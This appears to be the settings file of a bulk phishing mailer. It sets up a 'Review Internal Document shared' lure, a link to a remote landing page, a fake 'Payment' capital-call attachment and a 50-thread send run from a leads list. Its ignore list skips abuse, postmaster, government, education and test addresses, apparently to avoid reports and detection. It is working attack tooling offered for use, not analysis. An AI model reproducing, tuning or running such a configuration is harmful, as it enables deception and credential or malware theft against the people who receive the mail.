[TOKEN]
token : qBj4x2DjVmkGmlD

[SMTP]
loadsmtp : False
smtpserv :  {mx}
port : 25
username : 
password : 
fromemail : 
secure : False
authy : False
priority : HIGH

[SEND INFO]
name : {companyname}.
subject : Review Internal Document shared | REF-[random]{sec}.pdf - {date} 
fromemail : {email}

link : https://jcdrill.kz/c5ess8544i70i884.html?utm_source=cphpension.citrixdatacomds&utm_medium=044f9cbc41f238a9d&utm_campaign=46d1b392&utm_term=e9f03ca

[OPTION]
UsePause : True
PauseForSecs : 20
AfterSendEmail : 150
UseGoogle : 0
delay : 10
thread : 50
leads : leads.txt
mstype : html
useredirect : 0
403domain : http://linkfro.com
ignoreemail : True
igtype : Exclude
ignlist : abuse donotreply .ac.uk example rediffmail.com test webmaster postmaster .gov lcisd oxfarm altayer.com ifes school .in .edu example@ test webmaster demon mailer mailer-daemon @yahoo noreply no-reply postmaster customercare customer @hotmail. @live.
reply :  

[DOC OPTION]
usedoc : False
docname : Payment#{number200}.xhtml
doctit : 'REIG Asset Management' First Capital Call
doctype : HTML
autohtml : False
hide_html_code : False
creationdelay : 5

